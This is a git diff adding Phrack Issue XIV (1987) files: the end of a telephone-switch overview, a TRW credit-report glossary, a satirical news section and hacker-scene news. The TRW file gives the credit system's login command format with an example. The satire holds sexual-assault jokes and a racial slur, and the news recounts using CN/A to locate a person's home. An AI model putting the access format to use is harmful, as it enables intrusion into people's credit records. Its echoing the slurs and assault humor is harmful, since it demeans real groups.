+and from many possible Billing Validation Centers (BVCs).  Messages
+transmitted to the BVC about MCCS include the billing number and the Personal
+Identification Number (PIN).  In BNS the messages have the special billing
+number (collect or third number).  The return messages from the BVC include
+validity (of the number), billing restrictions (if any), and the Revenue
+Accounting Office (RAO) code.
+
+
+Auxiliary Operator Services System
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The DMS-200 Auxiliary Operator Services System (AOSS) is used primarily for
+Directory Assistance and the intercept needs that are not included in the TOPS
+package.  The AOSS is similar to TOPS and co-exists with TOPS on the DMS-200
+Toll system.
+
+Major benefits of the AOSS include:  Directory Assistance is provided with a
+modern environment, AOSS position administrative activities are performed by
+the DMS-200 toll maintenance system, trunking savings are achieved by
+combining trunking for 1+, 0+, and Directory Assistance traffic, DA services
+are managed by using TOPS methods, creation of a built-in training system
+which does not require additional training equipment and reduces training
+costs.
+
+
+Integrated Business Network
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Integrated Business Network (IBN) is a revenue-producing concept designed
+for small and big businesses to offer modernized PBX and Centrex features.
+The Operating Company can use the IBN to maintain and enhance its competitive
+position on a operational DMS-100 and DMS 100/200 switches.   While using the
+DMS-100 switch, the Operating Company can support varying business features
+along with existing local/toll traffic.
+
+IBN services can be introduced to a Centrex-Central Office (CO) or a
+Centrex-Customer Unit (CU) by additional software modules and minor hardware
+enhancements.
+
+Current IBN features include:  A growing system that can handle 30,000 lines,
+networking capabilities, city wide service for DMS-100 switch and remotes for
+any one customer Station Message Detail Recording (SMDR), which gives IBN
+customers call records.  The records can be used for system analysis and
+control and station charge-back.  SMDR can use LAMA records (if the IBN host
+has LAMA equipment), centralized attendant maintenance, and administration
+functions and Direct Inward Dialing (DID).
+
+
+Electronic Switched Network (ESN)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Electronic Switched Network is designed to meet the telecommunication
+needs of large multi-location corporations.  The ESN is made up of a SL-1 or
+SL-100 Digital Business Communications System with networking features or a
+DMS-100 IBN host.  The SL-1 can handle from 30-5000 lines.  The SL-100 and the
+DMS-100 IBN hosts can hold from a few thousands to 30,000 lines.
+
+A DMS-100 IBN or SL-100 can remotely serve many locations from the host site.
+This is done by a connection through digital transmission facilities which are
+set up at remote modules at the subscriber's premises.
+
+Here are some diagrams showing the differences between normal private
+telecommunications networks and ESN networks.
+
+                      Normal telecommunications network
+                      =================================
+
+           -----               ------
+ [Phone]--| SnS |             | SL-1 |-[Phone]
+          | PBX |             | PBX  |
+           -----               ------
+           |  |DOD/DID   DOD/DID|  |
+           |   -------   -------   |
+           |Tie       | |       Tie|
+           |Trunk  ---------  Trunk|
+            ------| Class-5 |------
+              ----| Centrex |----
+             |     ---------     |
+             |                   |
+             |                   |
+             |                   |
+           -----  Tie Trunk  ---------
+          | SnS | ----------| Class-5 |
+          | PBX |           | Centrex |
+           -----             ---------
+             |                   |
+             |                   |
+             |                   |
+             |                   |
+          -------             ------
+ [Phone]-| Small |           | SL-1 |-[Phone]
+         |  PBX  |           |      |
+          -------             ------
+
+
+                                  ESN Network
+                                  ===========
+          --------                               ----------
+[phone]--| Remote |                             | SL-1 PBX |--[phone]
+         | Module |                             | ESN Main |
+          --------                               ----------
+              |                                       |
+              |  DS-1 Facility                        |  DS-1 Facility
+              |            --------------             |
+               -------->  | Local Class 5|  <---------
+          [phone]---------|    DMS-100   |
+                      ----|    IBN/ESN   |-------------
+        2W Loop MFIDP |    --------------             | ESN Trunk Group
+           or DS-1    |           |                   |     or DS-1
+                      |         -----         ---------------
+                      |        | CSC |       | Local Class 5 |
+                   --------     -----        |    DMS-100    |
+                  | SL-100 | <--- DS-1 ----> |    IBN/ESN    |
+                   --------     Facility      ---------------
+                      |                              |
+                      |                              |
+                      | DS-1 Facility                | DS-1 Facility
+                      |                              |
+                   --------                      ----------
+         [phone]--| Remote |                    | SL-1 PBX |--[phone]
+                  | Module |                    | ESN Main |
+                   --------                      ----------
+
+
+
+
+Specialized Common Carrier Service (SCCS)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability
+of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are
+necessary with analog circuits.  The DMS-250 can also switch voice and data
+circuits.
+
+The DMS-250 takes either analog or digitally encoded info and by using time
+slot interchange, switches it from any input port to a temporary addressed and
+connected exit port.  The info may or may not be converted back to analog.
+
+Cellular Mobile Radio Service
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A cellular system consists of two main parts:  a cellular switch and cell site
+equipment.
+
+
+Cellular Switching Systems
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+A cellular switch performs three main functions:  audio switching, cell site
+control, and system administration.
+
+The DMS switches provide three basic implementations for cellular switching:
+Stand-alone, Combined, and Remote.
+
+Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
+interfaced with one or more class 5 end offices.  The connection is made by
+DID/DOD trunks.  Depending on the needs of the area, the MTX can be divided as
+follows:  MTX which serves urban areas, MTXC which handles suburban areas, and
+MTXM which is used for rural areas.
+
+Combined switching is incorporated into a DMS-100 by some hardware additions
+and cellular software.  Combined switching is designed to give an easy,
+cost-effective way to install cellular services to an existing host.
+
+Remote Switching is done by combining Remote Switching Center (RSC) with a
+Cell Site Controller (CSC).  This combination is hosted by either a
+stand-alone or a combined switch.  Remote Switching is designed for serving
+suburban centers, remote areas, or a small community and it gives extra
+flexibility for a growing system.
+
+All of these cellular switches have the ability to balance the workload among
+various cell sites.  For example, if one site's workload reaches the
+programmable level of congestion, calls would be routed to nearby sites that
+can handle the extra calls.
+
+
+Cell Site Equipment
+~~~~~~~~~~~~~~~~~~~
+Cell site equipment consists of a CSC and radio equipment.  The CSC is
+controlled by the cellular switch and it controls radio equipment and
+maintenance tasks.  The CSC will work on any MTX cellular switch because of
+the Remote Cluster Controller (RCC).
+
+The radio equipment consists of self-contained Radio Channel Units (RCU),
+antennas, transmitter multi-couplers, and receiver combiners.
+
+By different program software, an RCU can perform voice, control locating, and
+test functions.  The self contained nature allows the RCU be remotely located
+to the CSC.  A RCU has built-in circuitry for extended testing of the radio
+part of the system.
+
+
+                                  Control C
+
+<End of File>
+  <May 1987>
+______________________________________________________________________________
diff --git a/phrack14/6.txt b/phrack14/6.txt
new file mode 100644
index 0000000..9ba46f5
--- /dev/null
+++ b/phrack14/6.txt
@@ -0,0 +1,129 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 6 of 9
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                           TRW Business Terminology
+                           ~~~ ~~~~~~~~ ~~~~~~~~~~~
+                                 by Control C
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Term           Explanation
+----           -----------
+Legal          Legal Involvement
+Collect        Collection Account
+Writ-Off       Account Written Off
+NSF            Not Sufficient Funds
+Lease Default  Lease Default
+Liens          Liens
+Repo           Repossessed
+RFC            Refused Further Credit
+Pays-Sol       Pays Slow
+Not Pay AA     Not Paying as Agreed
+Cia-Our-Req    Cash in Advance-Our Request
+Was Pastdue    Account was Past Due
+Was Problem    Problems In the Past
+CIA            Cash in Advance
+Adj.Bureau     Adjustment Bureau
+COD            Cash on Delivery
+COD Cusreq     COD Customer Request
+Adv-Trend      Advertise Trend
+New Owner      Recent Ownership Change
+Hldg-Ord       Holding Orders
+Secured        Secured Account
+Discount       Discount
+Improving      Improving
+Unr-Disc       Unearned Discount Taken
+X-Deduct       Unauthorized Deductions
+Ref Fin Chg    Refused Finance Charge
+Satsftry       Satisfactory Account
+Bond Satis     Bonding Satisfactory
+Prompt         Pays Promptly
+Exlent Acct    Excellent Account
+1st Sale       First Sale
+21 Dys Late    21 Days Late
+14 Dys Late    14 Days Late
+7 Dys Late     7 Days Late
+Exc Disc       Excessive Discount Taken
+Dispute        Dispute Invoice
+Prod Complt    Product Complaint
+Consol Note    Consolidation Note
+Ltd.Exp        Limited Experience
+Note           Pays By Note
+Floor Plan     Floor Plan Account
+Trd-Acpt       Pays by Trade Acceptance
+Ern Disc       Earned Discount Taken
+Job Complet    Job Completed
+Unfl-Ord       Unfilled Orders
+Installment    Installment Account
+New Account    New Account
+Consignment    Sell on Consignment
+Retention      Retention
+Multi Locate   Multiple Locations Comments not Available
+ADS XXX        Average Days Slow
+Sold XXX Yrs   Number of Years Sold
+DDWA XXX       Dollar-Days Weighted Average
+
+
+                                 Payment Terms
+                                 ------- -----
+
+Term           Explanation
+----           -----------
+Net X          Net Due in X Days
+Net Eom        Net amount due by the end of the month
+Net Prx        Net amount due on the 1st of the following month
+N10 Prxo       Net due within 10 days of the first of the following month
+N10 Eom        Net due within 10 days of the end of the month
+X/10 N15       X Percentage discount if paid in 10 days or total amount
+               due in 15 days
+X/15 N30       X percentage discount if paid in 15 days or total amount
+               due in 30 days
+X/30 N45       X percentage discount if paid in 30 days or total amount
+               due in 45 days
+X/10 Eom       X percentage discount if paid in 10 days or total amount
+               due at the end of the month
+X/15 Eom       X percentage discount if paid in 15 days or total amount
+               due at the end of the month
+X/10 Prx       X percentage discount if paid in 10 days, otherwise due on
+               the first of the following month
+X/15 Prx       X percentage discount if paid in 15 days, otherwise due on
+               the first of the following month
+X/Eom          X percentage discount if paid by end of month
+X/Prox         X percentage discount if paid by the first of the following
+               month
+Cs Dis         Discount in return for payment before final due date.
+Tr Dis         Reduction of the selling price and is always available to the
+               customer regardless of the lateness of the payment
+Special        Special terms offered by seller
+Contrct        As stated in contract
+Varied         Offers several different terms
+Roi            Remit on receipt of invoice
+D/S            Draft Payable at sight
+D/O            Draft with order
+COD            Cash on Delivery
+COD-Req        COD at seller's request
+CIA            Cash in advance
+CIA-Req        CIA at seller's request
+CWO            Cash with order
+NET            Balance Due
+Multi          Customer has more than one way of paying
+Note           Written promise to pay at a specific time
+Cash           Cash only
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                     Login
+                                     -----
+The proper format for TRW is as follows:
+
+TCA1 RTS subcode+pw lastname firstname middleinitial...,street# streetinit
+zipcode
+
+Example:  (Subscriber code is 1234567 and PW is OS5)
+
+TCA1 RTS 1234567OS5 SMITH JOHN S...,3123 H 37923[Ctrl S][Ctrl M]
+
+                     ^C
+______________________________________________________________________________
diff --git a/phrack14/7.txt b/phrack14/7.txt
new file mode 100644
index 0000000..ec8e477
--- /dev/null
+++ b/phrack14/7.txt
@@ -0,0 +1,289 @@
+                               ==Phrack Inc.==
+
+                            Issue XIV, File 7 of 9
+
+     ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
+     PWN                                                             PWN
+     ^*^                 ^*^  Phrack World News  ^*^                 ^*^
+     PWN                      Special Edition I                      PWN
+     ^*^                                                             ^*^
+     PWN                Edited, Compiled, and Written                PWN
+     ^*^                     by Knight Lightning                     ^*^
+     PWN                                                             PWN
+     ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^
+
+Welcome to the first Phrack World News "Special Edition."  In this issue we
+have two parts.  The first section deals with possible news stories of the
+future after the weekend of June 19-21... SummerCon '87!  The second section
+is a presentation of acronyms that never were, but should be.  All posts have
+been taken from Metal Shop Private prior to its takedown in June.  Posts have
+been edited for this presentation.
+
+PWN Special Edition is not a regular series and will only appear when the
+author deems it necessary to release one.   Please keep in mind that all
+material in this file was written several weeks prior to SummerCon '87 and
+therefore the events chronicled here are supposed fiction and comedy.
+
+Thank you -KL.
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Name: Phantom Phreaker
+
+SummerCon Prank Backfires                                        June 31, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~
+Well, the SummerCon went over well, except when the convention attendees stole
+every payphone in the building and placed them in front of Taran King's hotel
+room, rang the door, and shouted "Room Service."  Needless to say, Taran King
+is now in jail until he can pay for all the stolen payphones.
+______________________________________________________________________________
+
+Name: Knight Lightning
+
+Phreak/Hack World Shut Down!                                     June 21, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+It happened yesterday when John Maxfield accompanied by Ralph Meola, Richard
+Proctor, Dan Pasquale, Edward P. Nowicki, and several members of the FBI,
+Secret Service, National Security Agency, and local baggers 402 literally
+invaded SummerCon '87, the annual phreak/hack reunion.  It has been reported
+that a total of 97 suspects have been placed in custody with crimes linking
+them to jay walking, loitering, curfew violation, disturbing the peace, and
+belching in excessive amounts.
+
+Details are sketchy but it appears that it all started when a very drunk pair
+of twins decided to visit the local McDonald's and demanded a COSMOS Sundae
+with passwords on the side.  When a very confused McDonald's employee refused,
+they became agitated and whipped out a blue box, using it to open the "trunks"
+of all the cars in the parking lot and then finally throwing it at an
+employee. A mad crowd of people rushed to the Best Western Executive
+International Inn and tried to storm the building when the other previously
+mentioned uninvited guests arrived.
+
+Final remarks from the twins... "So who wants to discuss CAMA?"
+
+ Information provided by F. R. Newsline Services and on the scene reporting by
+            Broadway Hacker (arrested for attempted prostitution).
+______________________________________________________________________________
+
+Name: Thomas Covenant
+
+SummerCon '87 "Laugh Riot"; Numerous Phreaks Still Missing       June 25, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(St Louis, PP)  Authorities are still searching for the nearly 100 missing
+telecom enthusiasts who gathered in town over the weekend for a convention.
+Apparently the missing parties were sitting around, undergoing the intake of
+many assorted consciousness altering chemicals, when a strange young man with
+shoulder length hair and wearing a Judas Priest jacket appeared.  He forced
+them all into a white 1957 Chevy pickup and took off, leaving only Evil Jay
+and Thomas Covenant behind.  Evil Jay was quoted as saying it was a "laugh
+riot." Thomas Covenant had nothing to say as he is in shock from the incident
+and currently undergoing treatment at the St. Louis Home for the Terminally
+Bewildered.
+______________________________________________________________________________
+
+Name: Phantom Phreaker
+
+Computer Enthusiasts Infected With The AIDS Virus                June 22, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From St. Louis Post Dispatch
+
+They called it "SummerCon," a gathering of "phone phreaks" and computer
+hackers who are loosely organized around a network of computer bulletin
+boards. However, tragedy struck the meeting when the hacker named Evil Jay
+tricked another hacker, Suicidal Nightmare, into entering the room belonging
+to Broadway Hacker.  Suicidal Nightmare was found in the parking lot with a
+torn anus.
+
+As if this wasn't bad enough, Broadway Hacker then went wild and began trying
+to molest the smallest hackers there.  He could be seen chasing Kango Kid
+while screaming about a flaming mailbox and rubbing his genital area.
+
+Other problems arose from the hackers meeting.  Several people were arrested
+for possession of cannibus and illegal possession of alcohol.  The other
+charges included:
+
+o  Intoxicated Pedestrian
+o  Disturbing the Peace
+o  Contributing to the delinquency of a minor
+o  Failure to yield at stop sign
+o  No turn signal
+o  Theft of telephones
+o  Verbally harassing telephone operators
+
+As you can see, these computer 'hackers' have no morals and decency and should
+not be allowed to meet.
+
+(C) Post Dispatch 2050
+    Written by Jack Meoff
+______________________________________________________________________________
+
+Name: Knight Lightning
+
+Phreak World Crippled; SummerCon Causes Despair                  June 22, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Today, the phreak world was astounded and dealt a horrifying blow as all the
+phreaks who attended SummerCon left with their entire phreak knowledge
+literally erased from their minds due to an excess of drinking and other
+unknown mind altering substances.  It is unknown as to if these effects are
+temporary or a life-long destruction.
+
+
+Anarchy World Takes Charge                                       June 23, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+MetalliBashers Inc. have become the new "LOD" of the modem world since all of
+the LOD members no longer can even remember what LOD stands for (in fact, no
+one can, and forget I mentioned it!).  With MBI taking charge, the new wave of
+the modem world has turned strictly anarchy, although there are rumors of
+various pirating organizations beginning to unload new wares soon.
+
+
+Investigators Lose Jobs!                                         June 24, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~
+John Maxfield reportedly lost ALL contracts today when it was discovered that
+the phreak/hack community was completely destroyed, thus no one needed
+protection from them.  He has now taken a job with the local sanitation
+management firm to help figure out what to do with all the garbage now that
+the phreak community wasn't stealing 1/3 of it anymore.
+______________________________________________________________________________
+
+Name:  Evil Jay
+
+Suicidal Nightmare - History                                     June 23, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Suicidal Nightmare met death head on when Evil Jay knocked on his door
+pretending to be a lineman checking on his line.  Once inside, Jay proceeded
+to swing a hand set at him with amazing accuracy.  Once dragged outside, Jay
+then proceeded to tie Suicidal naked to a tree and call the ever-lovin'
+Broadway Hacker over to do his stuff.  Jay was last heard pleading insanity.
+Suicidal Nightmare remains in intensive care, and Broadway Hacker is happy.
+______________________________________________________________________________
+
+That is the last of the news reports, now on with "Those Amazing Acronyms...!"
+______________________________________________________________________________
+
+Name: Doom Prophet
+
+FUCK-Facilities Utilization Control Kitchen.  A really hot office.  They keep
+     backups of all systems per a LATA, or in special cases, the entire BOC
+     area, along with user logs and passwords.  They use the CUNTLICK system
+     to interface with SHIT, explained momentarily.  They are difficult to
+     reach as no one knows their number, and anyone calling it has to enter a
+     special queue dispenser where he enters routing information to reach the
+     FUCK ACD.  The FUCK technicians answer as normal subscribers and you have
+     to tell them a codeword.
+
+PENIS-Plant Engineering Network Information System.  Used by the PMS to deal
+      with outside plant details and layout maps.
+
+CUNTLICK-Computer Utilities Network In the Control Kitchen.  Used to sensor
+         with SHIT.
+
+SHIT-Supreme Hardware Inventory Totals.  Self explanatory.
+
+CRAP-Customer Repair Analysis Service.  They use PENIS to supply PMS with
+     info.
+
+PISS-Primary Intertoll Switching Servicemen.  Co-ordinate classes 1 through 4
+     toll offices and monitor the STP's.
+
+BITCH-Building Installation Table Channel.  Used by SHIT technicians to obtain
+      new switch and office status.
+
+SCAB-Switching Cable Analysis Bureau.  They work with PMS for trunk testing
+     and maintenance.  The systems they use are FART and DOPAMINE.
+
+BASTARD-Box Accessible System To Aid Real D00ds.  A special in band NPA with
+        full OSC support for blue boxers to experiment within legally.  Only
+        operating in special areas.
+______________________________________________________________________________
+
+Name: Phantom Phreaker
+
+DOGSHIT-Division Operations Group SHIT (see above post).  DOGSHIT is like
+        SHIT, except that DOGSHIT is in a division.
+
+CATPISS-Centralized Automatic Tandem Priorities Interexchange Support System.
+        Self-explanatory.
+
+BEER-Bell Electrical Engineering Research
+
+COOL-Computerized Operations On Loops
+______________________________________________________________________________
+
+Name: Taran King
+
+BOOGER-Bell Operational Office for Generation of ESS Reports.  Self
+       Explanatory.
+
+STAN-Spanish Tacos And Nachos.  This support group, Californian based,
+     maintains food services for all superior employees (all employees).
+
+NATE-Nacho And Taco Emissary.  This department secretly interfaces STAN with
+     the rest of the network due to the STAN group's inability to fit in with
+     society.  **Due to divestiture, NATE and STAN are no longer part of the
+     network**
+
+IL DUCE-Not an acronym, but the janitorial services department of the network.
+
+PUMPKIN-Peripheral Unit Modulator Phor Kitchen Installations of NATE.  This
+        group is in charge of interfacing kitchen activities through Project
+        Genesis.  See RAPE.
+
+BRRR-RING-The official word for the sound an AT&T phone makes receiving an
+          incoming call.
+
+BANANA-Basic Analog Network Analog Network Analog (No wonder they went
+       digital)
+
+RAPE-Red Afro-PUMPKIN Enthusiast.  This group, led by Peter, cheers IL DUCE
+     while he sweeps the floors.
+
+SCOOP-Secondary Command Output Only Procedure.  This converts all text to
+      lower case.  It is a function used in most Bell computers along with
+      LEX.
+
+LEX-Lengthy Explanatory Xlations.  This program, found alongside SCOOP,
+    converts all lowercase text, from SCOOP, into upper case and 40 columns
+    surrounded by "$"s.
+
+** Warning!  Never leave SCOOP and LEX running simultaneously or you will
+surely cause L666 to occur. **
+
+L666-The warning message generated by computers indicating endless loops of
+     conflicting jobs.  This also indicates that everything is fucked.  See
+     LOKI.
+
+LOKI-Life Over-Kill Incentive.  If you find this error message on your
+     computer, do not reboot the computer, but be sure to reboot something.
+______________________________________________________________________________
+
+Name: The Disk Jockey
+
+SNATCH-Senses Nodes And Traps Code Hackers
+
+TITS-Telephone Involved in Tandem Skipping
+
+PUBIC-Plastered Uniforms Brought Inside CO (An employee infraction)
+
+RAD-Receive Analog Department
+
+DISC-Deadbeats Instinctively Scanning for Carriers
+
+LAP-Local Area Payphone
+
+Or use the codewords that Linemen and Telco employees use....
+
+This                  Means This
+----                  ----------
+"OHFUCKNIGS"          "I'm trapped in a phone booth in a black neighborhood"
+"FIDOFUCK"            "A customer's pet dog has me trapped up a pole"
+"HOMEBONE"            "I got laid while doing a customer's installation"
+"SNOOZEBOX"           "I'm sleeping, but saying I'm fixing little green boxes"
+______________________________________________________________________________
+
+This concludes Phrack World News Special Edition.  I hope you enjoyed it.  If
+you have any comments or ideas be sure to get in touch with me or Taran King.
+
+:Knight Lightning
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
diff --git a/phrack14/8.txt b/phrack14/8.txt
new file mode 100644
index 0000000..dfa06ff
--- /dev/null
+++ b/phrack14/8.txt
@@ -0,0 +1,345 @@
+     PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
+     ^*^                                                             ^*^
+     PWN                 ^*^ Phrack World News ^*^                   PWN
+     ^*^                          Issue XIV                          ^*^
+     PWN                                                             PWN
+     ^*^            ^*^ Compiled, Written, and Edited ^*^            ^*^
+     PWN                     by Knight Lightning                     PWN
+     ^*^                                                             ^*^
+     PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN ^*^ PWN
+
+
+On the Home Front/SummerCon '87                                 April 22, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Well I'd like to start off this issue with an apology to my readers.  Although
+I had suspected it for quite some time, I never had any real reason to doubt
+the validity of some of the past events detailed in PWN.  Please disregard and
+ignore these previous stories relating to Oryan QUEST.
+
+       Oryan QUEST Busted/415 Gets Hit Again              PWN Issue 4-2
+       Dan Pasquale Seeks New Entertainment               PWN Issue 4-3
+       Oryan QUEST Vs. Dan Pasquale                       PWN Issue 6-1
+       Dan Pasquale:  Still Hostile Or Ancient History?   PWN Issue 7-1
+
+The events regarding Oryan QUEST getting busted or having anything to do with
+Dan Pasquale (of the Fremont Police Department) were fictional propaganda
+devised and given to me under false pretenses by Oryan QUEST in an attempt to
+make himself look like a more experienced phreak and to give him more
+publicity and fame in the phreak/hack world.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Re-Announcing SummerCon!  The biggest and best phreak/hack convention ever!
+Scheduled for June 19,20 1987 in St. Louis, Missouri and sponsored by
+TeleComputist Newsletter, Phrack Inc., and Metal Shop Private.
+
+The festivities will take place at the Executive International Best Western.
+There will be two adjoining rooms for guests to sack out in, but you are
+welcome to grab your own for space and privacy reasons.  The phone number at
+the hotel is (314) 731-3800.  The name being used to rent the rooms and the
+room numbers will remain unannounced until June 19, 1987 where this
+information will be placed on the Phrack Inc./Metal Shop Private VMS and the
+TeleComputist Information Line.  This is to prevent any individuals from
+spoiling our fun at the Conference.
+
+We have received quite a few confirmations about people going and have heard
+from dozens more who plan to attend.  Just based on who we know for sure, this
+will be an event to remember for the rest of your lives.
+
+The schedule works sort of like this;
+
+Friday Night       - Party and introductions
+Saturday Afternoon - The conference will commence in the hotel's banquet hall.
+Saturday Night     - More partying
+Sunday Morning     - Everyone cruises home
+
+Guests are asked to please bring some extra cash to help pay for the expense
+of this weekend.  The front money will be supplied by the sponsors, but any
+help will be greatly appreciated.  Thanks.
+
+Remember, everyone is welcome to show up.  We only ask that you inform us
+(myself, Taran King, and/or Forest Ranger) of your plans.  This also applies
+for speaking at the conference.  Please inform us of the topic and how long
+you plan to talk.
+
+If you have any further questions please contact Knight Lightning, Taran King,
+or Forest Ranger on any bulletin board you can find us, the Phrack Inc./Metal
+Shop Private VMS, or call the TeleComputist Information Line at 314-921-7938.
+
+Hope to see you there.
+
+:Knight Lightning
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+                          *** Special Newsflash ***
+
+                             ^*^ Free Seminar ^*^
+
+When:         June 19, 1987 (Morning and Evening)
+Where:        Sheraton Plaza
+              900 West Port Plaza
+              St. Louis, Missouri [Good timing isn't it]
+
+Topics:       Advanced Tolls For Protocol Analysis
+              Using the OSI 7-layer model
+
+              Special operator interfaces for:  - entry level operators
+                                                - protocol technicians
+                                                - software engineers
+
+              Test T1, SNA, X.25, ISDN, SS#7 with the same tester
+
+Presented by:  Atlantic Resource Corporation
+Featuring:     The INTERVIEW 7000 (R) Series Protocol Analyzers
+Discussion:    T1 Testing
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Call to register:
+
+Tell them you are (pick one):
+
+- A manger responsible for protocol testing and certification
+- An engineer developing OSI 7-layer protocols
+- A network manager
+- Tech control supervisors
+
+Seating is limited so act quickly.
+
+                  RSVP Atlantic Research Corp.  800-368-3261
+______________________________________________________________________________
+
+Voice Numbers; The Road To Retirement                            April 5, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A rebuttal by Kerrang Khan (Edited for PWN)
+
+Contrary to popular opinion, I actually have a reason for not giving out my
+phone number.  There has been enough bullshit about this "incident," and I
+guess it's time I gave my side of the story.
+
+I don't want anyone to have my phone number.  Nobody in the phreak/hack world
+needs it.  I'm easily reached via boards etc., and if it is that important to
+speak with me voice, loops and bridges do exist.  It may be more convenient
+for you to have my voice number, but I don't think its really worth the risk.
+Face it, security people are getting serious about tracking people down.
+
+Unless you move around the country on a monthly basis, you might as well
+retire when your phone number gets 'out'.  This is not to say everyone whose
+number isn't secure is due to be busted but consider the following:
+
+If I have your phone number I also have:
+
+1) Your full name
+2) Age
+3) Address
+4) Criminal record (its public knowledge)
+
+As well as just about anything else that comes to mind.  If I can do that,
+just think what an investigator can do.  As far as Psychic Warlord's policy of
+no number, no access goes, well I think it sucks.  Anyone here remember "The
+Board" in 313?  [See Phrack World News Issues 7-1 and 9-1 for information
+concerning "THE BOARD" and its aftermath.]
+
+I don't know much about Psychic Warlord and he doesn't need to know much about
+me.  Its his system, and he can do what he likes with it, but I hope this
+isn't the wave of the future.  Its a good policy not to leave phone numbers
+when calling boards for the first time, and after that, you'll have to use
+common sense.  That is what it all comes down to, common sense.  It seems to
+be in short supply these days.
+
+                      Post Taken From Metal Shop Private
+______________________________________________________________________________
+
+Metalland South:  Phreak BBS or MetalliFEDS Inc.?                 June 2, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Metalland South BBS, at 404-327-2327, was once a fairly well known bulletin
+board, where many respected members of the hack/phreak community resided.  It
+was originally operated by two guys from Metal Communications, Inc., but it
+wasn't an MCI club board.  The sysop was Iron Man and the co-sysop was Black
+Lord.  Recently, it has come to the writer's attention, that MS has come under
+new management, new policies, and possibly a new idea; Sting.
+
+Somewhere around September-October 1986, Iron Man removed all of the hack/
+phreak related subboards as well as all G-philes from the system.  He was
+apparently worried about getting busted.  The last time this reporter spoke
+with him, Iron Man said he intended to put the hack/phreak subs back up. Then,
+not long after this conversation, the number was changed (The original number
+was 404-576-5166).
+
+A person using the alias of The Caretaker was made co-sysop and Iron Man would
+not reply to feedback.  Everything was handled by The Caretaker [TC from now
+on].  TC did not allow any hack/phreak subs, but said he would put them up if
+the users would follow STRICT validation procedures.
+
+Strict validation on MS includes:
+
+^*^  Your Real Name
+^*^  Your Address
+^*^  Your Voice Phone Number
+^*^  A Self-Addressed Envelope (in which he will send back with your account
+     number and password.)
+
+It is obvious to see the ramifications here.  A board or sysop gets busted and
+then makes a deal to turn over the board to some company or agency.  To make
+sure that they get who they want, you have to give them all this info, and the
+only you can get a password is to let them mail it to you, thus guaranteeing
+that if something illegal is posted under that account, you are responsible,
+no ifs, ands, or buts.
+
+Now, with the always helpful use of CN/A and various other special procedures,
+this reporter and several others have contacted the home of The Caretaker.  TC
+will not admit to being or to not being The Caretaker.  He says he "may be."
+Also, while speaking with to Taran King, TC tried to engineer Taran's phone
+number three times, using trickery like "let's be friends, what is your phone
+number?"  TK gave the guy the MSP number, figuring everyone has it.  Also TC
+is older than 18 (estimated at age 30), and he has three phone lines in his
+house.  When called, he will not admit to who he is, who runs MS, or who is
+the sysop of it.  Also, besides begging for you phone number (or demanding he
+call you).  TC tries to trap you into admitting that you are/have committed
+toll fraud.  In TK's case, TC tried to get Taran to admit to using other
+person's LD service PINs.
+
+The whole aura of mystery around Metalland South seems enough to make it not
+worth calling.  I urge you never to call this system and never send in
+information like that to any system.
+
+Recently I have spoken with Iron Man, and he says "I gave the board to some
+guy cause I was sick of running it."  Well, he is lying as you will see in the
+following transcript:
+
+ME:  So, gave it away.  To who?
+IM:  I really don't know him that well.  I can give you his first name.
+ME:  No, that is okay.  How old is he?
+IM:  I don't know.  We only talked once and I sent him the software.
+ME:  Is his name XXXXX, XXXXX (TC's real name)?
+IM:  I really don't know.
+ME:  So why did you give the board to someone you don't know?
+IM:  That was the only chance of keeping it up.
+
+Now, IM do you know him or not?  Do you just go throwing the board around?  I
+thought you said you knew his first name?
+
+^*^  How the heck could he send him the software and not know his name?
